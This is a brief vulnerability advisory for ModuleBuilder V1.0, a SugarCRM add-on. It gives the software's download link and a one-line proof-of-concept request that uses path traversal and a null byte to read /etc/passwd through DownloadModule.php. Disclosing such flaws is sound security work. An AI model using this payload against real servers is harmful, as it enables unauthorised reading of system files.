ModuleBuilder version 1.0 suffers from a remote file disclosure vulnerability.
176200e6d0e88ad2ab7115f6be4c1b1cModuleBuilder V1.0 (file) Remote File Disclosure Vulnerability
http://www.sugarforge.org/frs/download.php/1274/install_ModuleBuilderV1.0.zip
/modules/Builder/DownloadModule.php?file=../../../../../../../../etc/passwd%00
Comments
No comments yet, be the first!